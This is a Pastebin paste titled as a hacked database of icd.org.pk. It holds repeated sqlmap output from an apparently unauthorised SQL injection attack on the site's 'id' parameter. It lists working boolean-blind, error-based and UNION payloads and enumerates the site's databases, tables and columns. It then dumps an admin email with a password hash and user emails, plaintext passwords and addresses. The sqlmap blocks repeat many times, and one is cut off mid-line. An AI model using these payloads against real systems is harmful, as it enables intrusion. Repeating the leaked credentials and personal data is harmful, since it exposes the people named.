Guest User

icd.org.pk hacked database

a guest
Dec 22nd, 2016
49
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 37.33 KB | None | 0 0
  1. sqlmap identified the following injection points with a total of 74 HTTP(s) requests:
  2. ---
  3. Place: GET
  4. Parameter: id
  5. Type: boolean-based blind
  6. Title: AND boolean-based blind - WHERE or HAVING clause
  7. Payload: id=16' AND 2021=2021 AND 'RmLb'='RmLb
  8.  
  9. Type: error-based
  10. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  11. Payload: id=16' AND (SELECT 2160 FROM(SELECT COUNT(*),CONCAT(0x7165616e71,(SELECT (CASE WHEN (2160=2160) THEN 1 ELSE 0 END)),0x7169717271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'yfoq'='yfoq
  12.  
  13. Type: UNION query
  14. Title: MySQL UNION query (NULL) - 16 columns
  15. Payload: id=-4545' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7165616e71,0x4c7a6a4f546549765745,0x7169717271),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
  16. ---
  17. web application technology: PHP 5.3.29
  18. back-end DBMS: MySQL 5.0
  19. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  20. ---
  21. Place: GET
  22. Parameter: id
  23. Type: boolean-based blind
  24. Title: AND boolean-based blind - WHERE or HAVING clause
  25. Payload: id=16' AND 2021=2021 AND 'RmLb'='RmLb
  26.  
  27. Type: error-based
  28. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  29. Payload: id=16' AND (SELECT 2160 FROM(SELECT COUNT(*),CONCAT(0x7165616e71,(SELECT (CASE WHEN (2160=2160) THEN 1 ELSE 0 END)),0x7169717271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'yfoq'='yfoq
  30.  
  31. Type: UNION query
  32. Title: MySQL UNION query (NULL) - 16 columns
  33. Payload: id=-4545' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7165616e71,0x4c7a6a4f546549765745,0x7169717271),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
  34. ---
  35. web application technology: PHP 5.3.29
  36. back-end DBMS: MySQL 5.0
  37. available databases [2]:
  38. [*] efnypvon_icd_db
  39. [*] information_schema
  40.  
  41. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  42. ---
  43. Place: GET
  44. Parameter: id
  45. Type: boolean-based blind
  46. Title: AND boolean-based blind - WHERE or HAVING clause
  47. Payload: id=16' AND 2021=2021 AND 'RmLb'='RmLb
  48.  
  49. Type: error-based
  50. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  51. Payload: id=16' AND (SELECT 2160 FROM(SELECT COUNT(*),CONCAT(0x7165616e71,(SELECT (CASE WHEN (2160=2160) THEN 1 ELSE 0 END)),0x7169717271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'yfoq'='yfoq
  52.  
  53. Type: UNION query
  54. Title: MySQL UNION query (NULL) - 16 columns
  55. Payload: id=-4545' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7165616e71,0x4c7a6a4f546549765745,0x7169717271),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
  56. ---
  57. web application technology: PHP 5.3.29
  58. back-end DBMS: MySQL 5.0
  59. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  60. ---
  61. Place: GET
  62. Parameter: id
  63. Type: boolean-based blind
  64. Title: AND boolean-based blind - WHERE or HAVING clause
  65. Payload: id=16' AND 2021=2021 AND 'RmLb'='RmLb
  66.  
  67. Type: error-based
  68. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  69. Payload: id=16' AND (SELECT 2160 FROM(SELECT COUNT(*),CONCAT(0x7165616e71,(SELECT (CASE WHEN (2160=2160) THEN 1 ELSE 0 END)),0x7169717271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'yfoq'='yfoq
  70.  
  71. Type: UNION query
  72. Title: MySQL UNION query (NULL) - 16 columns
  73. Payload: id=-4545' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7165616e71,0x4c7a6a4f546549765745,0x7169717271),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
  74. ---
  75. web application technology: PHP 5.3.29
  76. back-end DBMS: MySQL 5.0
  77. Database: information_schema
  78. [61 tables]
  79. +---------------------------------------+
  80. | CHARACTER_SETS |
  81. | COLLATIONS |
  82. | COLLATION_CHARACTER_SET_APPLICABILITY |
  83. | COLUMNS |
  84. | COLUMN_PRIVILEGES |
  85. | ENGINES |
  86. | EVENTS |
  87. | FILES |
  88. | GLOBAL_STATUS |
  89. | GLOBAL_VARIABLES |
  90. | INNODB_BUFFER_PAGE |
  91. | INNODB_BUFFER_PAGE_LRU |
  92. | INNODB_BUFFER_POOL_STATS |
  93. | INNODB_CMP |
  94. | INNODB_CMPMEM |
  95. | INNODB_CMPMEM_RESET |
  96. | INNODB_CMP_PER_INDEX |
  97. | INNODB_CMP_PER_INDEX_RESET |
  98. | INNODB_CMP_RESET |
  99. | INNODB_FT_BEING_DELETED |
  100. | INNODB_FT_CONFIG |
  101. | INNODB_FT_DEFAULT_STOPWORD |
  102. | INNODB_FT_DELETED |
  103. | INNODB_FT_INDEX_CACHE |
  104. | INNODB_FT_INDEX_TABLE |
  105. | INNODB_LOCKS |
  106. | INNODB_LOCK_WAITS |
  107. | INNODB_METRICS |
  108. | INNODB_SYS_COLUMNS |
  109. | INNODB_SYS_DATAFILES |
  110. | INNODB_SYS_FIELDS |
  111. | INNODB_SYS_FOREIGN |
  112. | INNODB_SYS_FOREIGN_COLS |
  113. | INNODB_SYS_INDEXES |
  114. | INNODB_SYS_TABLES |
  115. | INNODB_SYS_TABLESPACES |
  116. | INNODB_SYS_TABLESTATS |
  117. | INNODB_SYS_VIRTUAL |
  118. | INNODB_TEMP_TABLE_INFO |
  119. | INNODB_TRX |
  120. | KEY_COLUMN_USAGE |
  121. | OPTIMIZER_TRACE |
  122. | PARAMETERS |
  123. | PARTITIONS |
  124. | PLUGINS |
  125. | PROCESSLIST |
  126. | PROFILING |
  127. | REFERENTIAL_CONSTRAINTS |
  128. | ROUTINES |
  129. | SCHEMATA |
  130. | SCHEMA_PRIVILEGES |
  131. | SESSION_STATUS |
  132. | SESSION_VARIABLES |
  133. | STATISTICS |
  134. | TABLES |
  135. | TABLESPACES |
  136. | TABLE_CONSTRAINTS |
  137. | TABLE_PRIVILEGES |
  138. | TRIGGERS |
  139. | USER_PRIVILEGES |
  140. | VIEWS |
  141. +---------------------------------------+
  142.  
  143. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  144. ---
  145. Place: GET
  146. Parameter: id
  147. Type: boolean-based blind
  148. Title: AND boolean-based blind - WHERE or HAVING clause
  149. Payload: id=16' AND 2021=2021 AND 'RmLb'='RmLb
  150.  
  151. Type: error-based
  152. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  153. Payload: id=16' AND (SELECT 2160 FROM(SELECT COUNT(*),CONCAT(0x7165616e71,(SELECT (CASE WHEN (2160=2160) THEN 1 ELSE 0 END)),0x7169717271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'yfoq'='yfoq
  154.  
  155. Type: UNION query
  156. Title: MySQL UNION query (NULL) - 16 columns
  157. Payload: id=-4545' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7165616e71,0x4c7a6a4f546549765745,0x7169717271),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
  158. ---
  159. web application technology: PHP 5.3.29
  160. back-end DBMS: MySQL 5.0
  161. Database: efnypvon_icd_db
  162. [30 tables]
  163. +----------------------------+
  164. | icd_addresses |
  165. | icd_basic_pages |
  166. | icd_category |
  167. | icd_contactus_entries |
  168. | icd_courses |
  169. | icd_download_category |
  170. | icd_events |
  171. | icd_faqs |
  172. | icd_featured_ads |
  173. | icd_footer_info |
  174. | icd_gallery_images |
  175. | icd_header_info |
  176. | icd_home_welcome |
  177. | icd_homepage_banner |
  178. | icd_media_coverage_videos |
  179. | icd_members |
  180. | icd_membership |
  181. | icd_online_enquiries |
  182. | icd_practitioner_directory |
  183. | icd_quick_links |
  184. | icd_social_media |
  185. | icd_tbl_admin |
  186. | icd_tbl_country |
  187. | icd_tbl_mysql_code |
  188. | icd_tbl_subscribers |
  189. | icd_tbl_templates |
  190. | icd_testimonials |
  191. | icd_upload_files |
  192. | icd_users |
  193. | icd_videos |
  194. +----------------------------+
  195.  
  196. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  197. ---
  198. Place: GET
  199. Parameter: id
  200. Type: boolean-based blind
  201. Title: AND boolean-based blind - WHERE or HAVING clause
  202. Payload: id=16' AND 2021=2021 AND 'RmLb'='RmLb
  203.  
  204. Type: error-based
  205. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  206. Payload: id=16' AND (SELECT 2160 FROM(SELECT COUNT(*),CONCAT(0x7165616e71,(SELECT (CASE WHEN (2160=2160) THEN 1 ELSE 0 END)),0x7169717271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'yfoq'='yfoq
  207.  
  208. Type: UNION query
  209. Title: MySQL UNION query (NULL) - 16 columns
  210. Payload: id=-4545' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7165616e71,0x4c7a6a4f546549765745,0x7169717271),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
  211. ---
  212. web application technology: PHP 5.3.29
  213. back-end DBMS: MySQL 5.0
  214. Database: efnypvon_icd_db
  215. Table: icd_tbl_admin
  216. [8 columns]
  217. +---------------------------+---------------+
  218. | Column | Type |
  219. +---------------------------+---------------+
  220. | fEmail | varchar(255) |
  221. | fPassword | varchar(255) |
  222. | fStatus | tinyint(2) |
  223. | fUserID | int(11) |
  224. | fUserName | varchar(20) |
  225. | last_login | datetime |
  226. | super_admin | enum('0','1') |
  227. | user_reply_email_contents | text |
  228. +---------------------------+---------------+
  229.  
  230. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  231. ---
  232. Place: GET
  233. Parameter: id
  234. Type: boolean-based blind
  235. Title: AND boolean-based blind - WHERE or HAVING clause
  236. Payload: id=16' AND 2021=2021 AND 'RmLb'='RmLb
  237.  
  238. Type: error-based
  239. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  240. Payload: id=16' AND (SELECT 2160 FROM(SELECT COUNT(*),CONCAT(0x7165616e71,(SELECT (CASE WHEN (2160=2160) THEN 1 ELSE 0 END)),0x7169717271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'yfoq'='yfoq
  241.  
  242. Type: UNION query
  243. Title: MySQL UNION query (NULL) - 16 columns
  244. Payload: id=-4545' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7165616e71,0x4c7a6a4f546549765745,0x7169717271),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
  245. ---
  246. web application technology: PHP 5.3.29
  247. back-end DBMS: MySQL 5.0
  248. Database: efnypvon_icd_db
  249. Table: icd_tbl_admin
  250. [1 entry]
  251. +-----------------+----------------------------------+
  252. | fEmail | fPassword |
  253. +-----------------+----------------------------------+
  254. | info@icd.org.pk | b61372eb4289a91ef1e8c851a2818093 |
  255. +-----------------+----------------------------------+
  256.  
  257. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  258. ---
  259. Place: GET
  260. Parameter: id
  261. Type: boolean-based blind
  262. Title: AND boolean-based blind - WHERE or HAVING clause
  263. Payload: id=16' AND 2021=2021 AND 'RmLb'='RmLb
  264.  
  265. Type: error-based
  266. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  267. Payload: id=16' AND (SELECT 2160 FROM(SELECT COUNT(*),CONCAT(0x7165616e71,(SELECT (CASE WHEN (2160=2160) THEN 1 ELSE 0 END)),0x7169717271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'yfoq'='yfoq
  268.  
  269. Type: UNION query
  270. Title: MySQL UNION query (NULL) - 16 columns
  271. Payload: id=-4545' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7165616e71,0x4c7a6a4f546549765745,0x7169717271),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
  272. ---
  273. web application technology: PHP 5.3.29
  274. back-end DBMS: MySQL 5.0
  275. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  276. ---
  277. Place: GET
  278. Parameter: id
  279. Type: boolean-based blind
  280. Title: AND boolean-based blind - WHERE or HAVING clause
  281. Payload: id=16' AND 2021=2021 AND 'RmLb'='RmLb
  282.  
  283. Type: error-based
  284. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  285. Payload: id=16' AND (SELECT 2160 FROM(SELECT COUNT(*),CONCAT(0x7165616e71,(SELECT (CASE WHEN (2160=2160) THEN 1sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  286. ---
  287. Place: GET
  288. Parameter: id
  289. Type: boolean-based blind
  290. Title: AND boolean-based blind - WHERE or HAVING clause
  291. Payload: id=16' AND 2021=2021 AND 'RmLb'='RmLb
  292.  
  293. Type: error-based
  294. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  295. Payload: id=16' AND (SELECT 2160 FROM(SELECT COUNT(*),CONCAT(0x7165616e71,(SELECT (CASE WHEN (2160=2160) THEN 1 ELSE 0 END)),0x7169717271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'yfoq'='yfoq
  296.  
  297. Type: UNION query
  298. Title: MySQL UNION query (NULL) - 16 columns
  299. Payload: id=-4545' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7165616e71,0x4c7a6a4f546549765745,0x7169717271),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
  300. ---
  301. web application technology: PHP 5.3.29
  302. back-end DBMS: MySQL 5.0
  303. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  304. ---
  305. Place: GET
  306. Parameter: id
  307. Type: boolean-based blind
  308. Title: AND boolean-based blind - WHERE or HAVING clause
  309. Payload: id=16' AND 2021=2021 AND 'RmLb'='RmLb
  310.  
  311. Type: error-based
  312. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  313. Payload: id=16' AND (SELECT 2160 FROM(SELECT COUNT(*),CONCAT(0x7165616e71,(SELECT (CASE WHEN (2160=2160) THEN 1 ELSE 0 END)),0x7169717271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'yfoq'='yfoq
  314.  
  315. Type: UNION query
  316. Title: MySQL UNION query (NULL) - 16 columns
  317. Payload: id=-4545' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7165616e71,0x4c7a6a4f546549765745,0x7169717271),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
  318. ---
  319. web application technology: PHP 5.3.29
  320. back-end DBMS: MySQL 5.0
  321. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  322. ---
  323. Place: GET
  324. Parameter: id
  325. Type: boolean-based blind
  326. Title: AND boolean-based blind - WHERE or HAVING clause
  327. Payload: id=16' AND 2021=2021 AND 'RmLb'='RmLb
  328.  
  329. Type: error-based
  330. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  331. Payload: id=16' AND (SELECT 2160 FROM(SELECT COUNT(*),CONCAT(0x7165616e71,(SELECT (CASE WHEN (2160=2160) THEN 1 ELSE 0 END)),0x7169717271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'yfoq'='yfoq
  332.  
  333. Type: UNION query
  334. Title: MySQL UNION query (NULL) - 16 columns
  335. Payload: id=-4545' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7165616e71,0x4c7a6a4f546549765745,0x7169717271),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
  336. ---
  337. web application technology: PHP 5.3.29
  338. back-end DBMS: MySQL 5.0
  339. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  340. ---
  341. Place: GET
  342. Parameter: id
  343. Type: boolean-based blind
  344. Title: AND boolean-based blind - WHERE or HAVING clause
  345. Payload: id=16' AND 2021=2021 AND 'RmLb'='RmLb
  346.  
  347. Type: error-based
  348. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  349. Payload: id=16' AND (SELECT 2160 FROM(SELECT COUNT(*),CONCAT(0x7165616e71,(SELECT (CASE WHEN (2160=2160) THEN 1 ELSE 0 END)),0x7169717271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'yfoq'='yfoq
  350.  
  351. Type: UNION query
  352. Title: MySQL UNION query (NULL) - 16 columns
  353. Payload: id=-4545' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7165616e71,0x4c7a6a4f546549765745,0x7169717271),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
  354. ---
  355. web application technology: PHP 5.3.29
  356. back-end DBMS: MySQL 5.0
  357. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  358. ---
  359. Place: GET
  360. Parameter: id
  361. Type: boolean-based blind
  362. Title: AND boolean-based blind - WHERE or HAVING clause
  363. Payload: id=16' AND 2021=2021 AND 'RmLb'='RmLb
  364.  
  365. Type: error-based
  366. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  367. Payload: id=16' AND (SELECT 2160 FROM(SELECT COUNT(*),CONCAT(0x7165616e71,(SELECT (CASE WHEN (2160=2160) THEN 1 ELSE 0 END)),0x7169717271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'yfoq'='yfoq
  368.  
  369. Type: UNION query
  370. Title: MySQL UNION query (NULL) - 16 columns
  371. Payload: id=-4545' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7165616e71,0x4c7a6a4f546549765745,0x7169717271),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
  372. ---
  373. web application technology: PHP 5.3.29
  374. back-end DBMS: MySQL 5.0
  375. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  376. ---
  377. Place: GET
  378. Parameter: id
  379. Type: boolean-based blind
  380. Title: AND boolean-based blind - WHERE or HAVING clause
  381. Payload: id=16' AND 2021=2021 AND 'RmLb'='RmLb
  382.  
  383. Type: error-based
  384. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  385. Payload: id=16' AND (SELECT 2160 FROM(SELECT COUNT(*),CONCAT(0x7165616e71,(SELECT (CASE WHEN (2160=2160) THEN 1 ELSE 0 END)),0x7169717271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'yfoq'='yfoq
  386.  
  387. Type: UNION query
  388. Title: MySQL UNION query (NULL) - 16 columns
  389. Payload: id=-4545' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7165616e71,0x4c7a6a4f546549765745,0x7169717271),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
  390. ---
  391. web application technology: PHP 5.3.29
  392. back-end DBMS: MySQL 5.0
  393. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  394. ---
  395. Place: GET
  396. Parameter: id
  397. Type: boolean-based blind
  398. Title: AND boolean-based blind - WHERE or HAVING clause
  399. Payload: id=16' AND 2021=2021 AND 'RmLb'='RmLb
  400.  
  401. Type: error-based
  402. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  403. Payload: id=16' AND (SELECT 2160 FROM(SELECT COUNT(*),CONCAT(0x7165616e71,(SELECT (CASE WHEN (2160=2160) THEN 1 ELSE 0 END)),0x7169717271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'yfoq'='yfoq
  404.  
  405. Type: UNION query
  406. Title: MySQL UNION query (NULL) - 16 columns
  407. Payload: id=-4545' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7165616e71,0x4c7a6a4f546549765745,0x7169717271),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
  408. ---
  409. web application technology: PHP 5.3.29
  410. back-end DBMS: MySQL 5.0
  411. Database: efnypvon_icd_db
  412. [30 tables]
  413. +----------------------------+
  414. | icd_addresses |
  415. | icd_basic_pages |
  416. | icd_category |
  417. | icd_contactus_entries |
  418. | icd_courses |
  419. | icd_download_category |
  420. | icd_events |
  421. | icd_faqs |
  422. | icd_featured_ads |
  423. | icd_footer_info |
  424. | icd_gallery_images |
  425. | icd_header_info |
  426. | icd_home_welcome |
  427. | icd_homepage_banner |
  428. | icd_media_coverage_videos |
  429. | icd_members |
  430. | icd_membership |
  431. | icd_online_enquiries |
  432. | icd_practitioner_directory |
  433. | icd_quick_links |
  434. | icd_social_media |
  435. | icd_tbl_admin |
  436. | icd_tbl_country |
  437. | icd_tbl_mysql_code |
  438. | icd_tbl_subscribers |
  439. | icd_tbl_templates |
  440. | icd_testimonials |
  441. | icd_upload_files |
  442. | icd_users |
  443. | icd_videos |
  444. +----------------------------+
  445.  
  446. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  447. ---
  448. Place: GET
  449. Parameter: id
  450. Type: boolean-based blind
  451. Title: AND boolean-based blind - WHERE or HAVING clause
  452. Payload: id=16' AND 2021=2021 AND 'RmLb'='RmLb
  453.  
  454. Type: error-based
  455. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  456. Payload: id=16' AND (SELECT 2160 FROM(SELECT COUNT(*),CONCAT(0x7165616e71,(SELECT (CASE WHEN (2160=2160) THEN 1 ELSE 0 END)),0x7169717271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'yfoq'='yfoq
  457.  
  458. Type: UNION query
  459. Title: MySQL UNION query (NULL) - 16 columns
  460. Payload: id=-4545' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7165616e71,0x4c7a6a4f546549765745,0x7169717271),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
  461. ---
  462. web application technology: PHP 5.3.29
  463. back-end DBMS: MySQL 5.0
  464. Database: efnypvon_icd_db
  465. Table: icd_users
  466. [18 columns]
  467. +----------------------+---------------+
  468. | Column | Type |
  469. +----------------------+---------------+
  470. | address | text |
  471. | city | varchar(255) |
  472. | company_name | varchar(255) |
  473. | country | varchar(255) |
  474. | credit_for_net | varchar(255) |
  475. | display_order | int(11) |
  476. | first_name | varchar(255) |
  477. | is_credit_customer | enum('0','1') |
  478. | join_date | date |
  479. | last_name | varchar(255) |
  480. | newsletter_subscribe | enum('0','1') |
  481. | post_code | varchar(255) |
  482. | province_state | varchar(255) |
  483. | telephone | varchar(255) |
  484. | user_email | varchar(255) |
  485. | user_id | int(11) |
  486. | user_password | varchar(255) |
  487. | user_status | tinyint(4) |
  488. +----------------------+---------------+
  489.  
  490. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  491. ---
  492. Place: GET
  493. Parameter: id
  494. Type: boolean-based blind
  495. Title: AND boolean-based blind - WHERE or HAVING clause
  496. Payload: id=16' AND 2021=2021 AND 'RmLb'='RmLb
  497.  
  498. Type: error-based
  499. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  500. Payload: id=16' AND (SELECT 2160 FROM(SELECT COUNT(*),CONCAT(0x7165616e71,(SELECT (CASE WHEN (2160=2160) THEN 1 ELSE 0 END)),0x7169717271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'yfoq'='yfoq
  501.  
  502. Type: UNION query
  503. Title: MySQL UNION query (NULL) - 16 columns
  504. Payload: id=-4545' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7165616e71,0x4c7a6a4f546549765745,0x7169717271),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
  505. ---
  506. web application technology: PHP 5.3.29
  507. back-end DBMS: MySQL 5.0
  508. Database: efnypvon_icd_db
  509. Table: icd_users
  510. [3 entries]
  511. +---------+-------------------------+---------------+
  512. | user_id | user_email | user_password |
  513. +---------+-------------------------+---------------+
  514. | 3 | hussaincochin@gmail.com | 773828 |
  515. | 6 | ship@yahoo.com | ship |
  516. | 9 | tester@mail.com | tester |
  517. +---------+-------------------------+---------------+
  518.  
  519. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  520. ---
  521. Place: GET
  522. Parameter: id
  523. Type: boolean-based blind
  524. Title: AND boolean-based blind - WHERE or HAVING clause
  525. Payload: id=16' AND 2021=2021 AND 'RmLb'='RmLb
  526.  
  527. Type: error-based
  528. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  529. Payload: id=16' AND (SELECT 2160 FROM(SELECT COUNT(*),CONCAT(0x7165616e71,(SELECT (CASE WHEN (2160=2160) THEN 1 ELSE 0 END)),0x7169717271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'yfoq'='yfoq
  530.  
  531. Type: UNION query
  532. Title: MySQL UNION query (NULL) - 16 columns
  533. Payload: id=-4545' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7165616e71,0x4c7a6a4f546549765745,0x7169717271),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
  534. ---
  535. web application technology: PHP 5.3.29
  536. back-end DBMS: MySQL 5.0
  537. Database: efnypvon_icd_db
  538. Table: icd_users
  539. [18 columns]
  540. +----------------------+---------------+
  541. | Column | Type |
  542. +----------------------+---------------+
  543. | address | text |
  544. | city | varchar(255) |
  545. | company_name | varchar(255) |
  546. | country | varchar(255) |
  547. | credit_for_net | varchar(255) |
  548. | display_order | int(11) |
  549. | first_name | varchar(255) |
  550. | is_credit_customer | enum('0','1') |
  551. | join_date | date |
  552. | last_name | varchar(255) |
  553. | newsletter_subscribe | enum('0','1') |
  554. | post_code | varchar(255) |
  555. | province_state | varchar(255) |
  556. | telephone | varchar(255) |
  557. | user_email | varchar(255) |
  558. | user_id | int(11) |
  559. | user_password | varchar(255) |
  560. | user_status | tinyint(4) |
  561. +----------------------+---------------+
  562.  
  563. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  564. ---
  565. Place: GET
  566. Parameter: id
  567. Type: boolean-based blind
  568. Title: AND boolean-based blind - WHERE or HAVING clause
  569. Payload: id=16' AND 2021=2021 AND 'RmLb'='RmLb
  570.  
  571. Type: error-based
  572. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  573. Payload: id=16' AND (SELECT 2160 FROM(SELECT COUNT(*),CONCAT(0x7165616e71,(SELECT (CASE WHEN (2160=2160) THEN 1 ELSE 0 END)),0x7169717271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'yfoq'='yfoq
  574.  
  575. Type: UNION query
  576. Title: MySQL UNION query (NULL) - 16 columns
  577. Payload: id=-4545' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7165616e71,0x4c7a6a4f546549765745,0x7169717271),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
  578. ---
  579. web application technology: PHP 5.3.29
  580. back-end DBMS: MySQL 5.0
  581. Database: efnypvon_icd_db
  582. Table: icd_users
  583. [3 entries]
  584. +------------------+------------+--------------------+
  585. | address | first_name | is_credit_customer |
  586. +------------------+------------+--------------------+
  587. | 209 Pasture Lane | Hussain | 0 |
  588. | 2783 Canada | ship | 0 |
  589. | Address | fname | 1 |
  590. +------------------+------------+--------------------+
  591.  
  592. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  593. ---
  594. Place: GET
  595. Parameter: id
  596. Type: boolean-based blind
  597. Title: AND boolean-based blind - WHERE or HAVING clause
  598. Payload: id=16' AND 2021=2021 AND 'RmLb'='RmLb
  599.  
  600. Type: error-based
  601. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  602. Payload: id=16' AND (SELECT 2160 FROM(SELECT COUNT(*),CONCAT(0x7165616e71,(SELECT (CASE WHEN (2160=2160) THEN 1 ELSE 0 END)),0x7169717271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'yfoq'='yfoq
  603.  
  604. Type: UNION query
  605. Title: MySQL UNION query (NULL) - 16 columns
  606. Payload: id=-4545' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7165616e71,0x4c7a6a4f546549765745,0x7169717271),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
  607. ---
  608. web application technology: PHP 5.3.29
